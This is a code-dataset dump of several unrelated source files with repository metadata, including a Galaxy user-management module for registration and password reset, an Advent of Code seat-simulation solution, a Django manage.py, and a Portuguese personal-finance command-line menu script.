if self.app.config.smtp_server is None:
return "Mail is not configured for this Galaxy instance and password reset information cannot be sent. Please contact your local Galaxy administrator."
email = payload.get("email")
if not email:
return "Please provide your email."
message = validate_email(trans, email, check_dup=False)
if message:
return message
else:
reset_user, prt = self.get_reset_token(trans, email)
if prt:
host = self.__get_host(trans)
reset_url = url_for(controller='root', action='login', token=prt.token)
body = PASSWORD_RESET_TEMPLATE % (host, prt.expiration_time.strftime(trans.app.config.pretty_datetime_format),
trans.request.host, reset_url)
frm = trans.app.config.email_from or 'galaxy-no-reply@' + host
subject = 'Galaxy Password Reset'
try:
util.send_mail(frm, email, subject, body, self.app.config)
trans.sa_session.add(reset_user)
trans.sa_session.flush()
trans.log_event('User reset password: %s' % email)
except Exception as e:
log.debug(body)
return "Failed to submit email. Please contact the administrator: %s" % util.unicodify(e)
else:
return "Failed to produce password reset token. User not found."
def get_reset_token(self, trans, email):
reset_user = trans.sa_session.query(self.app.model.User).filter(self.app.model.User.table.c.email == email).first()
if not reset_user:
# Perform a case-insensitive check only if the user wasn't found
reset_user = trans.sa_session.query(self.app.model.User).filter(func.lower(self.app.model.User.table.c.email) == func.lower(email)).first()
if reset_user:
prt = self.app.model.PasswordResetToken(reset_user)
trans.sa_session.add(prt)
trans.sa_session.flush()
return reset_user, prt
return None, None
def __get_host(self, trans):
host = trans.request.host.split(':')[0]
if host in ['localhost', '127.0.0.1', '0.0.0.0']:
host = socket.getfqdn()
return host
def send_subscription_email(self, email):
if self.app.config.smtp_server is None:
return "Subscribing to the mailing list has failed because mail is not configured for this Galaxy instance. Please contact your local Galaxy administrator."
else:
body = 'Join Mailing list.\n'
to = self.app.config.mailing_join_addr
frm = email
subject = 'Join Mailing List'
try:
util.send_mail(frm, to, subject, body, self.app.config)
except Exception:
log.exception('Subscribing to the mailing list has failed.')
return "Subscribing to the mailing list has failed."
class UserSerializer(base.ModelSerializer, deletable.PurgableSerializerMixin):
model_manager_class = UserManager
def __init__(self, app):
"""
Convert a User and associated data to a dictionary representation.
"""
super(UserSerializer, self).__init__(app)
self.user_manager = self.manager
self.default_view = 'summary'
self.add_view('summary', [
'id', 'email', 'username'
])
self.add_view('detailed', [
# 'update_time',
# 'create_time',
'is_admin',
'total_disk_usage',
'nice_total_disk_usage',
'quota_percent',
'quota',
'deleted',
'purged',
# 'active',
'preferences',
# all tags
'tags_used',
# all annotations
# 'annotations'
], include_keys_from='summary')
def add_serializers(self):
super(UserSerializer, self).add_serializers()
deletable.PurgableSerializerMixin.add_serializers(self)
self.serializers.update({
'id' : self.serialize_id,
'create_time' : self.serialize_date,
'update_time' : self.serialize_date,
'is_admin' : lambda i, k, **c: self.user_manager.is_admin(i),
'preferences' : lambda i, k, **c: self.user_manager.preferences(i),
'total_disk_usage' : lambda i, k, **c: float(i.total_disk_usage),
'quota_percent' : lambda i, k, **c: self.user_manager.quota(i),
'quota' : lambda i, k, **c: self.user_manager.quota(i, total=True),
'tags_used' : lambda i, k, **c: self.user_manager.tags_used(i),
})
class UserDeserializer(base.ModelDeserializer):
"""
Service object for validating and deserializing dictionaries that
update/alter users.
"""
model_manager_class = UserManager
def add_deserializers(self):
super(UserDeserializer, self).add_deserializers()
self.deserializers.update({
'username' : self.deserialize_username,
})
def deserialize_username(self, item, key, username, trans=None, **context):
# TODO: validate_user_input requires trans and should(?) raise exceptions
# move validation to UserValidator and use self.app, exceptions instead
validation_error = validate_publicname(trans, username, user=item)
if validation_error:
raise base.ModelDeserializingError(validation_error)
return self.default_deserializer(item, key, username, trans=trans, **context)
class CurrentUserSerializer(UserSerializer):
model_manager_class = UserManager
def serialize(self, user, keys, **kwargs):
"""
Override to return at least some usage info if user is anonymous.
"""
kwargs['current_user'] = user
if self.user_manager.is_anonymous(user):
return self.serialize_current_anonymous_user(user, keys, **kwargs)
return super(UserSerializer, self).serialize(user, keys, **kwargs)
def serialize_current_anonymous_user(self, user, keys, trans=None, **kwargs):
# use the current history if any to get usage stats for trans' anonymous user
# TODO: might be better as sep. Serializer class
usage = 0
percent = None
history = trans.history
if history:
usage = self.app.quota_agent.get_usage(trans, history=trans.history)
percent = self.app.quota_agent.get_percent(trans=trans, usage=usage)
# a very small subset of keys available
values = {
'id' : None,
'total_disk_usage' : float(usage),
'nice_total_disk_usage' : util.nice_size(usage),
'quota_percent' : percent,
}
serialized = {}
for key in keys:
if key in values:
serialized[key] = values[key]
return serialized
class AdminUserFilterParser(base.ModelFilterParser, deletable.PurgableFiltersMixin):
model_manager_class = UserManager
model_class = model.User
def _add_parsers(self):
super(AdminUserFilterParser, self)._add_parsers()
deletable.PurgableFiltersMixin._add_parsers(self)
# PRECONDITION: user making the query has been verified as an admin
self.orm_filter_parsers.update({
'email' : {'op': ('eq', 'contains', 'like')},
'username' : {'op': ('eq', 'contains', 'like')},
'active' : {'op': ('eq')},
'disk_usage' : {'op': ('le', 'ge')}
})
self.fn_filter_parsers.update({})
| 42.207972 | 402 | 0.61686 | import logging
import random
import socket
from datetime import datetime
from markupsafe import escape
from sqlalchemy import and_, desc, exc, func, true
from galaxy import (
exceptions,
model,
util
)
from galaxy.managers import (
api_keys,
base,
deletable
)
from galaxy.security.validate_user_input import validate_email, validate_password, validate_publicname
from galaxy.web import url_for
log = logging.getLogger(__name__)
PASSWORD_RESET_TEMPLATE = """
To reset your Galaxy password for the instance at %s use the following link,
which will expire %s.
%s%s
If you did not make this request, no action is necessary on your part, though
you may want to notify an administrator.
If you're having trouble using the link when clicking it from email client, you
can also copy and paste it into your browser.
"""
class UserManager(base.ModelManager, deletable.PurgableManagerMixin):
foreign_key_name = 'user'
# TODO: there is quite a bit of functionality around the user (authentication, permissions, quotas, groups/roles)
# most of which it may be unneccessary to have here
# TODO: incorp BaseAPIController.validate_in_users_and_groups
# TODO: incorp CreatesApiKeysMixin
# TODO: incorporate UsesFormDefinitionsMixin?
def __init__(self, app):
self.model_class = app.model.User
super(UserManager, self).__init__(app)
def register(self, trans, email=None, username=None, password=None, confirm=None, subscribe=False):
if not trans.app.config.allow_user_creation and not trans.user_is_admin:
message = "User registration is disabled. Please contact your local Galaxy administrator for an account."
if trans.app.config.error_email_to is not None:
message += " Contact: %s" % trans.app.config.error_email_to
return None, message
if not email or not username or not password or not confirm:
return None, "Please provide email, username and password."
message = "\n".join([validate_email(trans, email),
validate_password(trans, password, confirm),
validate_publicname(trans, username)]).rstrip()
if message:
return None, message
email = util.restore_text(email)
username = util.restore_text(username)
message, status = trans.app.auth_manager.check_registration_allowed(email, username, password)
if message:
return None, message
if subscribe:
message = self.send_subscription_email(email)
if message:
return None, message
user = self.create(email=email, username=username, password=password)
if self.app.config.user_activation_on:
self.send_activation_email(trans, email, username)
return user, None
def create(self, email=None, username=None, password=None, **kwargs):
self._error_on_duplicate_email(email)
user = self.model_class(email=email)
user.set_password_cleartext(password)
user.username = username
if self.app.config.user_activation_on:
user.active = False
else:
# Activation is off, every new user is active by default.
user.active = True
self.session().add(user)
try:
self.session().flush()
# TODO:?? flush needed for permissions below? If not, make optional
except exc.IntegrityError as db_err:
raise exceptions.Conflict(str(db_err))
# can throw an sqlalx.IntegrityError if username not unique
self.app.security_agent.create_private_user_role(user)
# We set default user permissions, before we log in and set the default history permissions
if hasattr(self.app.config, "new_user_dataset_access_role_default_private"):
permissions = self.app.config.new_user_dataset_access_role_default_private
self.app.security_agent.user_set_default_permissions(user, default_access_private=permissions)
return user
def delete(self, user):
user.deleted = True
self.session().add(user)
self.session().flush()
def _error_on_duplicate_email(self, email):
# TODO: remove this check when unique=True is added to the email column
if self.by_email(email) is not None:
raise exceptions.Conflict('Email must be unique', email=email)
# ---- filters
def by_email(self, email, filters=None, **kwargs):
filters = self._munge_filters(self.model_class.email == email, filters)
try:
# TODO: use one_or_none
return super(UserManager, self).one(filters=filters, **kwargs)
except exceptions.ObjectNotFound:
return None
def by_email_like(self, email_with_wildcards, filters=None, order_by=None, **kwargs):
filters = self._munge_filters(self.model_class.email.like(email_with_wildcards), filters)
order_by = order_by or (model.User.email, )
return super(UserManager, self).list(filters=filters, order_by=order_by, **kwargs)
# ---- admin
def is_admin(self, user, trans=None):
admin_emails = self._admin_emails()
if user is None:
# Anonymous session or master_api_key used, if master_api_key is detected
# return True.
rval = bool(trans and trans.user_is_admin)
return rval
return bool(admin_emails and user.email in admin_emails)
def _admin_emails(self):
return [email.strip() for email in self.app.config.get("admin_users", "").split(",")]
def admins(self, filters=None, **kwargs):
filters = self._munge_filters(self.model_class.email.in_(self._admin_emails()), filters)
return super(UserManager, self).list(filters=filters, **kwargs)
def error_unless_admin(self, user, msg="Administrators only", **kwargs):
# useful in admin only methods
if not self.is_admin(user, trans=kwargs.get("trans", None)):
raise exceptions.AdminRequiredException(msg, **kwargs)
return user
# ---- anonymous
def is_anonymous(self, user):
# define here for single point of change and make more readable
return user is None
def error_if_anonymous(self, user, msg="Log-in required", **kwargs):
if user is None:
# TODO: code is correct (401) but should be named AuthenticationRequired (401 and 403 are flipped)
raise exceptions.AuthenticationFailed(msg, **kwargs)
return user
# ---- current
def current_user(self, trans):
# define here for single point of change and make more readable
# TODO: trans
return trans.user
# ---- api keys
def create_api_key(self, user):
# TODO: seems like this should return the model
return api_keys.ApiKeyManager(self.app).create_api_key(user)
# TODO: possibly move to ApiKeyManager
def valid_api_key(self, user):
query = (self.session().query(model.APIKeys)
.filter_by(user=user)
.order_by(desc(model.APIKeys.create_time)))
all = query.all()
if len(all):
return all[0]
return None
# TODO: possibly move to ApiKeyManager
def get_or_create_valid_api_key(self, user):
existing = self.valid_api_key(user)
if existing:
return existing
return self.create_api_key(self, user)
# ---- preferences
def preferences(self, user):
return dict((key, value) for key, value in user.preferences.items())
# ---- roles and permissions
def private_role(self, user):
return self.app.security_agent.get_private_user_role(user)
def sharing_roles(self, user):
return self.app.security_agent.get_sharing_roles(user)
def default_permissions(self, user):
return self.app.security_agent.user_get_default_permissions(user)
def quota(self, user, total=False):
if total:
return self.app.quota_agent.get_quota(user, nice_size=True)
return self.app.quota_agent.get_percent(user=user)
def tags_used(self, user, tag_models=None):
# TODO: simplify and unify with tag manager
if self.is_anonymous(user):
return []
# get all the taggable model TagAssociations
if not tag_models:
tag_models = [v.tag_assoc_class for v in self.app.tag_handler.item_tag_assoc_info.values()]
# create a union of subqueries for each for this user - getting only the tname and user_value
all_tags_query = None
for tag_model in tag_models:
subq = (self.session().query(tag_model.user_tname, tag_model.user_value)
.filter(tag_model.user == user))
all_tags_query = subq if all_tags_query is None else all_tags_query.union(subq)
# if nothing init'd the query, bail
if all_tags_query is None:
return []
tags = all_tags_query.distinct().all()
tags = [((name + ':' + val) if val else name) for name, val in tags]
return sorted(tags)
def change_password(self, trans, password=None, confirm=None, token=None, id=None, current=None):
if not token and not id:
return None, "Please provide a token or a user and password."
if token:
token_result = trans.sa_session.query(self.app.model.PasswordResetToken).get(token)
if not token_result or not token_result.expiration_time > datetime.utcnow():
return None, "Invalid or expired password reset token, please request a new one."
user = token_result.user
message = self.__set_password(trans, user, password, confirm)
if message:
return None, message
token_result.expiration_time = datetime.utcnow()
trans.sa_session.add(token_result)
return user, "Password has been changed. Token has been invalidated."
else:
user = self.by_id(self.app.security.decode_id(id))
if user:
message = self.app.auth_manager.check_change_password(user, current)
if message:
return None, message
message = self.__set_password(trans, user, password, confirm)
if message:
return None, message
return user, "Password has been changed."
else:
return user, "User not found."
def __set_password(self, trans, user, password, confirm):
if not password:
return "Please provide a new password."
if user:
message = validate_password(trans, password, confirm)
if message:
return message
else:
user.set_password_cleartext(password)
if trans.galaxy_session:
for other_galaxy_session in trans.sa_session.query(self.app.model.GalaxySession) \
.filter(and_(self.app.model.GalaxySession.table.c.user_id == user.id,
self.app.model.GalaxySession.table.c.is_valid == true(),
self.app.model.GalaxySession.table.c.id != trans.galaxy_session.id)):
other_galaxy_session.is_valid = False
trans.sa_session.add(other_galaxy_session)
trans.sa_session.add(user)
trans.sa_session.flush()
trans.log_event("User change password")
else:
return "Failed to determine user, access denied."
def send_activation_email(self, trans, email, username):
activation_token = self.__get_activation_token(trans, escape(email))
activation_link = url_for(controller='user', action='activate', activation_token=activation_token, email=escape(email), qualified=True)
host = self.__get_host(trans)
body = ("Hello %s,\n\n"
"In order to complete the activation process for %s begun on %s at %s, please click on the following link to verify your account:\n\n"
"%s \n\n"
"By clicking on the above link and opening a Galaxy account you are also confirming that you have read and agreed to Galaxy's Terms and Conditions for use of this service (%s). This includes a quota limit of one account per user. Attempts to subvert this limit by creating multiple accounts or through any other method may result in termination of all associated accounts and data.\n\n"
"Please contact us if you need help with your account at: %s. You can also browse resources available at: %s. \n\n"
"More about the Galaxy Project can be found at galaxyproject.org\n\n"
"Your Galaxy Team" % (escape(username), escape(email),
datetime.utcnow().strftime("%D"),
trans.request.host, activation_link,
self.app.config.terms_url,
self.app.config.error_email_to,
self.app.config.instance_resource_url))
to = email
frm = self.app.config.email_from or 'galaxy-no-reply@' + host
subject = 'Galaxy Account Activation'
try:
util.send_mail(frm, to, subject, body, self.app.config)
return True
except Exception:
log.debug(body)
log.exception('Unable to send the activation email.')
return False
def __get_activation_token(self, trans, email):
user = trans.sa_session.query(self.app.model.User).filter(self.app.model.User.table.c.email == email).first()
activation_token = user.activation_token
if activation_token is None:
activation_token = util.hash_util.new_secure_hash(str(random.getrandbits(256)))
user.activation_token = activation_token
trans.sa_session.add(user)
trans.sa_session.flush()
return activation_token
def send_reset_email(self, trans, payload={}, **kwd):
if self.app.config.smtp_server is None:
return "Mail is not configured for this Galaxy instance and password reset information cannot be sent. Please contact your local Galaxy administrator."
email = payload.get("email")
if not email:
return "Please provide your email."
message = validate_email(trans, email, check_dup=False)
if message:
return message
else:
reset_user, prt = self.get_reset_token(trans, email)
if prt:
host = self.__get_host(trans)
reset_url = url_for(controller='root', action='login', token=prt.token)
body = PASSWORD_RESET_TEMPLATE % (host, prt.expiration_time.strftime(trans.app.config.pretty_datetime_format),
trans.request.host, reset_url)
frm = trans.app.config.email_from or 'galaxy-no-reply@' + host
subject = 'Galaxy Password Reset'
try:
util.send_mail(frm, email, subject, body, self.app.config)
trans.sa_session.add(reset_user)
trans.sa_session.flush()
trans.log_event('User reset password: %s' % email)
except Exception as e:
log.debug(body)
return "Failed to submit email. Please contact the administrator: %s" % util.unicodify(e)
else:
return "Failed to produce password reset token. User not found."
def get_reset_token(self, trans, email):
reset_user = trans.sa_session.query(self.app.model.User).filter(self.app.model.User.table.c.email == email).first()
if not reset_user:
# Perform a case-insensitive check only if the user wasn't found
reset_user = trans.sa_session.query(self.app.model.User).filter(func.lower(self.app.model.User.table.c.email) == func.lower(email)).first()
if reset_user:
prt = self.app.model.PasswordResetToken(reset_user)
trans.sa_session.add(prt)
trans.sa_session.flush()
return reset_user, prt
return None, None
def __get_host(self, trans):
host = trans.request.host.split(':')[0]
if host in ['localhost', '127.0.0.1', '0.0.0.0']:
host = socket.getfqdn()
return host
def send_subscription_email(self, email):
if self.app.config.smtp_server is None:
return "Subscribing to the mailing list has failed because mail is not configured for this Galaxy instance. Please contact your local Galaxy administrator."
else:
body = 'Join Mailing list.\n'
to = self.app.config.mailing_join_addr
frm = email
subject = 'Join Mailing List'
try:
util.send_mail(frm, to, subject, body, self.app.config)
except Exception:
log.exception('Subscribing to the mailing list has failed.')
return "Subscribing to the mailing list has failed."
class UserSerializer(base.ModelSerializer, deletable.PurgableSerializerMixin):
model_manager_class = UserManager
def __init__(self, app):
super(UserSerializer, self).__init__(app)
self.user_manager = self.manager
self.default_view = 'summary'
self.add_view('summary', [
'id', 'email', 'username'
])
self.add_view('detailed', [
'is_admin',
'total_disk_usage',
'nice_total_disk_usage',
'quota_percent',
'quota',
'deleted',
'purged',
'preferences',
'tags_used',
], include_keys_from='summary')
def add_serializers(self):
super(UserSerializer, self).add_serializers()
deletable.PurgableSerializerMixin.add_serializers(self)
self.serializers.update({
'id' : self.serialize_id,
'create_time' : self.serialize_date,
'update_time' : self.serialize_date,
'is_admin' : lambda i, k, **c: self.user_manager.is_admin(i),
'preferences' : lambda i, k, **c: self.user_manager.preferences(i),
'total_disk_usage' : lambda i, k, **c: float(i.total_disk_usage),
'quota_percent' : lambda i, k, **c: self.user_manager.quota(i),
'quota' : lambda i, k, **c: self.user_manager.quota(i, total=True),
'tags_used' : lambda i, k, **c: self.user_manager.tags_used(i),
})
class UserDeserializer(base.ModelDeserializer):
model_manager_class = UserManager
def add_deserializers(self):
super(UserDeserializer, self).add_deserializers()
self.deserializers.update({
'username' : self.deserialize_username,
})
def deserialize_username(self, item, key, username, trans=None, **context):
validation_error = validate_publicname(trans, username, user=item)
if validation_error:
raise base.ModelDeserializingError(validation_error)
return self.default_deserializer(item, key, username, trans=trans, **context)
class CurrentUserSerializer(UserSerializer):
model_manager_class = UserManager
def serialize(self, user, keys, **kwargs):
kwargs['current_user'] = user
if self.user_manager.is_anonymous(user):
return self.serialize_current_anonymous_user(user, keys, **kwargs)
return super(UserSerializer, self).serialize(user, keys, **kwargs)
def serialize_current_anonymous_user(self, user, keys, trans=None, **kwargs):
# TODO: might be better as sep. Serializer class
usage = 0
percent = None
history = trans.history
if history:
usage = self.app.quota_agent.get_usage(trans, history=trans.history)
percent = self.app.quota_agent.get_percent(trans=trans, usage=usage)
# a very small subset of keys available
values = {
'id' : None,
'total_disk_usage' : float(usage),
'nice_total_disk_usage' : util.nice_size(usage),
'quota_percent' : percent,
}
serialized = {}
for key in keys:
if key in values:
serialized[key] = values[key]
return serialized
class AdminUserFilterParser(base.ModelFilterParser, deletable.PurgableFiltersMixin):
model_manager_class = UserManager
model_class = model.User
def _add_parsers(self):
super(AdminUserFilterParser, self)._add_parsers()
deletable.PurgableFiltersMixin._add_parsers(self)
# PRECONDITION: user making the query has been verified as an admin
self.orm_filter_parsers.update({
'email' : {'op': ('eq', 'contains', 'like')},
'username' : {'op': ('eq', 'contains', 'like')},
'active' : {'op': ('eq')},
'disk_usage' : {'op': ('le', 'ge')}
})
self.fn_filter_parsers.update({})
| true | true |
1c2cb830d024d7ea119b1306188a13f8ae5948df | 2,779 | py | Python | aoc_cas/aoc2020/day11.py | TedCassirer/advent-of-code | fb87dfdbb48b44f864337750aa58a809dcf72392 | [
"MIT"
] | 1 | 2020-11-30T19:17:50.000Z | 2020-11-30T19:17:50.000Z | aoc_cas/aoc2020/day11.py | TedCassirer/advent-of-code | fb87dfdbb48b44f864337750aa58a809dcf72392 | [
"MIT"
] | null | null | null | aoc_cas/aoc2020/day11.py | TedCassirer/advent-of-code | fb87dfdbb48b44f864337750aa58a809dcf72392 | [
"MIT"
] | null | null | null | FLOOR = "."
EMPTY = "L"
OCCUPIED = "#"
def tick(grid, rule, seatsToConnected):
Y, X = len(grid), len(grid[0])
newGrid = [row.copy() for row in grid]
totalSeatOccupied = 0
for coord, connected in seatsToConnected.items():
nearbyOccupied = sum(grid[y][x] == OCCUPIED for y, x in connected)
currentlyOccupied = grid[coord[0]][coord[1]] == OCCUPIED
updatedSeat = rule(currentlyOccupied, nearbyOccupied)
newGrid[coord[0]][coord[1]] = updatedSeat
totalSeatOccupied += updatedSeat == OCCUPIED
return newGrid, totalSeatOccupied
def part1(data):
grid = [list(row) for row in data.splitlines()]
Y, X = len(grid), len(grid[0])
def nearbySeats(y, x):
nearby = set()
for iy in range(max(0, y - 1), min(Y, y + 2)):
for ix in range(max(0, x - 1), min(X, x + 2)):
if ix == x and iy == y:
continue
if grid[iy][ix] != FLOOR:
nearby.add((iy, ix))
return nearby
def rule(occupied, nearbyOccupied):
if occupied:
return EMPTY if nearbyOccupied >= 4 else OCCUPIED
else:
return EMPTY if nearbyOccupied > 0 else OCCUPIED
coords = ((y, x) for y in range(Y) for x in range(X))
connectedSeats = {c: nearbySeats(*c) for c in coords if grid[c[0]][c[1]] != FLOOR}
seen = set()
occupiedSeats = 0
while occupiedSeats not in seen:
seen.add(occupiedSeats)
grid, occupiedSeats = tick(grid, rule, connectedSeats)
return occupiedSeats
def part2(data):
grid = [list(row) for row in data.splitlines()]
Y, X = len(grid), len(grid[0])
def nearbySeats(y, x):
nearby = set()
for dy in (-1, 0, 1):
for dx in (-1, 0, 1):
if dx == 0 and dy == 0:
continue
iy = y + dy
ix = x + dx
while 0 <= iy < Y and 0 <= ix < X:
if grid[iy][ix] == FLOOR:
iy += dy
ix += dx
continue
else:
nearby.add((iy, ix))
break
return nearby
def rule(occupied, nearbyOccupied):
if occupied:
return EMPTY if nearbyOccupied >= 5 else OCCUPIED
else:
return EMPTY if nearbyOccupied > 0 else OCCUPIED
coords = ((y, x) for y in range(Y) for x in range(X))
connectedSeats = {c: nearbySeats(*c) for c in coords if grid[c[0]][c[1]] != FLOOR}
seen = set()
occupiedSeats = 0
while occupiedSeats not in seen:
seen.add(occupiedSeats)
grid, occupiedSeats = tick(grid, rule, connectedSeats)
return occupiedSeats
| 30.877778 | 86 | 0.528967 | FLOOR = "."
EMPTY = "L"
OCCUPIED = "#"
def tick(grid, rule, seatsToConnected):
Y, X = len(grid), len(grid[0])
newGrid = [row.copy() for row in grid]
totalSeatOccupied = 0
for coord, connected in seatsToConnected.items():
nearbyOccupied = sum(grid[y][x] == OCCUPIED for y, x in connected)
currentlyOccupied = grid[coord[0]][coord[1]] == OCCUPIED
updatedSeat = rule(currentlyOccupied, nearbyOccupied)
newGrid[coord[0]][coord[1]] = updatedSeat
totalSeatOccupied += updatedSeat == OCCUPIED
return newGrid, totalSeatOccupied
def part1(data):
grid = [list(row) for row in data.splitlines()]
Y, X = len(grid), len(grid[0])
def nearbySeats(y, x):
nearby = set()
for iy in range(max(0, y - 1), min(Y, y + 2)):
for ix in range(max(0, x - 1), min(X, x + 2)):
if ix == x and iy == y:
continue
if grid[iy][ix] != FLOOR:
nearby.add((iy, ix))
return nearby
def rule(occupied, nearbyOccupied):
if occupied:
return EMPTY if nearbyOccupied >= 4 else OCCUPIED
else:
return EMPTY if nearbyOccupied > 0 else OCCUPIED
coords = ((y, x) for y in range(Y) for x in range(X))
connectedSeats = {c: nearbySeats(*c) for c in coords if grid[c[0]][c[1]] != FLOOR}
seen = set()
occupiedSeats = 0
while occupiedSeats not in seen:
seen.add(occupiedSeats)
grid, occupiedSeats = tick(grid, rule, connectedSeats)
return occupiedSeats
def part2(data):
grid = [list(row) for row in data.splitlines()]
Y, X = len(grid), len(grid[0])
def nearbySeats(y, x):
nearby = set()
for dy in (-1, 0, 1):
for dx in (-1, 0, 1):
if dx == 0 and dy == 0:
continue
iy = y + dy
ix = x + dx
while 0 <= iy < Y and 0 <= ix < X:
if grid[iy][ix] == FLOOR:
iy += dy
ix += dx
continue
else:
nearby.add((iy, ix))
break
return nearby
def rule(occupied, nearbyOccupied):
if occupied:
return EMPTY if nearbyOccupied >= 5 else OCCUPIED
else:
return EMPTY if nearbyOccupied > 0 else OCCUPIED
coords = ((y, x) for y in range(Y) for x in range(X))
connectedSeats = {c: nearbySeats(*c) for c in coords if grid[c[0]][c[1]] != FLOOR}
seen = set()
occupiedSeats = 0
while occupiedSeats not in seen:
seen.add(occupiedSeats)
grid, occupiedSeats = tick(grid, rule, connectedSeats)
return occupiedSeats
| true | true |
1c2cb8c075809655ec7ef0f7be5a20ec98d758c7 | 117 | py | Python | python_teste/python_aulas/aula_25.py | BrunoDantasMoreira/projectsPython | bd73ab0b3c067456407f227ed2ece42e7f21ddfc | [
"MIT"
] | 1 | 2020-07-27T14:18:08.000Z | 2020-07-27T14:18:08.000Z | python_teste/python_aulas/aula_25.py | BrunoDantasMoreira/projectsPython | bd73ab0b3c067456407f227ed2ece42e7f21ddfc | [
"MIT"
] | null | null | null | python_teste/python_aulas/aula_25.py | BrunoDantasMoreira/projectsPython | bd73ab0b3c067456407f227ed2ece42e7f21ddfc | [
"MIT"
] | null | null | null | nome = str(input('Qual seu nome completo? ')).strip()
print('Seu nome tem Silva? {}'.format('SILVA' in nome.upper())) | 58.5 | 63 | 0.666667 | nome = str(input('Qual seu nome completo? ')).strip()
print('Seu nome tem Silva? {}'.format('SILVA' in nome.upper())) | true | true |
1c2cb8e49b96fe48c28fbd234c1b58fd0fec13be | 58 | py | Python | app/routes/__init__.py | Luca-A-Magalhaes/himcd | 56c939bb077485adb8a75b37bf0655e1087bbfa4 | [
"MIT"
] | 2 | 2021-02-15T21:02:12.000Z | 2021-10-14T19:05:34.000Z | app/routes/__init__.py | Luca-A-Magalhaes/himcd | 56c939bb077485adb8a75b37bf0655e1087bbfa4 | [
"MIT"
] | null | null | null | app/routes/__init__.py | Luca-A-Magalhaes/himcd | 56c939bb077485adb8a75b37bf0655e1087bbfa4 | [
"MIT"
] | null | null | null | from app.routes.api import *
from app.routes.page import * | 29 | 29 | 0.775862 | from app.routes.api import *
from app.routes.page import * | true | true |
1c2cb9bd63e02cac23d2ce815fd9f657d9817cc4 | 254 | py | Python | manage.py | davidjrichardson/toucans | 7446b78ec2a09ff90eb83d4a78638c909deb06e1 | [
"MIT"
] | 1 | 2020-04-20T05:37:09.000Z | 2020-04-20T05:37:09.000Z | manage.py | davidjrichardson/toucans | 7446b78ec2a09ff90eb83d4a78638c909deb06e1 | [
"MIT"
] | 23 | 2019-03-13T10:54:36.000Z | 2022-03-11T23:33:59.000Z | manage.py | davidjrichardson/toucans | 7446b78ec2a09ff90eb83d4a78638c909deb06e1 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "toucans.settings.dev")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
| 23.090909 | 75 | 0.771654 |
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "toucans.settings.dev")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
| true | true |
1c2cba610a91053010dfd5163babc396c61a094a | 3,579 | py | Python | PyFinance/main.py | allangbr/PyFinance | 58d236259b232992bec8afe0ebcae4caae103fe3 | [
"MIT"
] | 1 | 2021-01-20T17:39:47.000Z | 2021-01-20T17:39:47.000Z | PyFinance/main.py | allangbr/PyFinance | 58d236259b232992bec8afe0ebcae4caae103fe3 | [
"MIT"
] | null | null | null | PyFinance/main.py | allangbr/PyFinance | 58d236259b232992bec8afe0ebcae4caae103fe3 | [
"MIT"
] | null | null | null | import funcoes as func
func.verificarArquivoReceitas()
func.verificarArquivoDespesas()
func.verificarArquivoPagamentos()
func.verificarArquivoCarteira()
func.verificarArquivoContas()
func.verificarArquivoSaques()
func.verificarArquivoDepositos()
func.verificarArquivoTransferencias()
resp = ""
while resp != "0":
resp = func.menu()
# 1 ______________________________________________________________________
if resp == "1":
func.addReceita()
# 2 ______________________________________________________________________
elif resp == "2":
func.buscarReceita()
# 3 ______________________________________________________________________
elif resp == "3":
func.excluirReceita()
# 4 ______________________________________________________________________
elif resp == "4":
func.editarReceita()
# 5 ______________________________________________________________________
elif resp == "5":
func.listarReceitas()
#6 _______________________________________________________________________
elif resp == "6":
func.adicionarDespesa()
#7 _______________________________________________________________________
elif resp == "7":
func.buscarDespesa()
#8 _______________________________________________________________________
elif resp == "8":
func.excluirDespesa()
#9 _______________________________________________________________________
elif resp == "9":
func.editarDespesa()
#10 ______________________________________________________________________
elif resp == "10":
func.listarDespesas()
#11 ______________________________________________________________________
elif resp == "11":
func.pagarDespesa()
#12 ______________________________________________________________________
elif resp == "12":
func.relatorioMensal()
#13 _________________________________________________________________________
elif resp == "13":
func.relatorioAnual()
#14 ____________________________________________________________________
elif resp == "14":
func.gerenciarCarteira()
#15 ___________________________________________________________________
elif resp == "15":
func.adicionarConta()
#16 ____________________________________________________________________
elif resp == "16":
func.buscarConta()
#17 ____________________________________________________________________
elif resp == "17":
func.excluirConta()
#18 ____________________________________________________________________
elif resp == "18":
func.editarConta()
#19 ____________________________________________________________________
elif resp == "19":
func.listarContas()
#20 ____________________________________________________________________
elif resp == "20":
func.realizarSaque()
#21 ______________________________________________________________________
elif resp == "21":
func.realizarDeposito()
#22 ____________________________________________________________________
elif resp == "22":
func.realizarTransferencia()
#23 ____________________________________________________________________
elif resp == "23":
func.emitirSaldo()
#24 ______________________________________________________________________
elif resp == "24":
func.emitirExtrato()
elif int(resp) < 0 or int(resp) > 24:
print("\nVocê informou um valor inválido para esta operação.\n")
print("\nOBRIGADO POR USAR O NOSSO SISTEMA!\n")
func.gravarArquivoReceitas()
func.gravarArquivoDespesas()
func.gravarArquivoCarteira()
func.gravarArquivoContas()
func.gravarArquivoSaques()
func.gravarArquivoDepositos()
func.gravarArquivoTransferencias()
func.gravarArquivoPagamentos() | 28.862903 | 77 | 0.822856 | import funcoes as func
func.verificarArquivoReceitas()
func.verificarArquivoDespesas()
func.verificarArquivoPagamentos()
func.verificarArquivoCarteira()
func.verificarArquivoContas()
func.verificarArquivoSaques()
func.verificarArquivoDepositos()
func.verificarArquivoTransferencias()
resp = ""
while resp != "0":
resp = func.menu()
if resp == "1":
func.addReceita()
elif resp == "2":
func.buscarReceita()
elif resp == "3":
func.excluirReceita()
elif resp == "4":
func.editarReceita()
elif resp == "5":
func.listarReceitas()
elif resp == "6":
func.adicionarDespesa()
elif resp == "7":
func.buscarDespesa()
elif resp == "8":
func.excluirDespesa()
elif resp == "9":
func.editarDespesa()
elif resp == "10":
func.listarDespesas()
elif resp == "11":
func.pagarDespesa()
elif resp == "12":
func.relatorioMensal()
elif resp == "13":
func.relatorioAnual()
elif resp == "14":
func.gerenciarCarteira()
elif resp == "15":
func.adicionarConta()
elif resp == "16":
func.buscarConta()
elif resp == "17":
func.excluirConta()
elif resp == "18":
func.editarConta()
elif resp == "19":
func.listarContas()
elif resp == "20":
func.realizarSaque()
elif resp == "21":
func.realizarDeposito()
elif resp == "22":
func.realizarTransferencia()
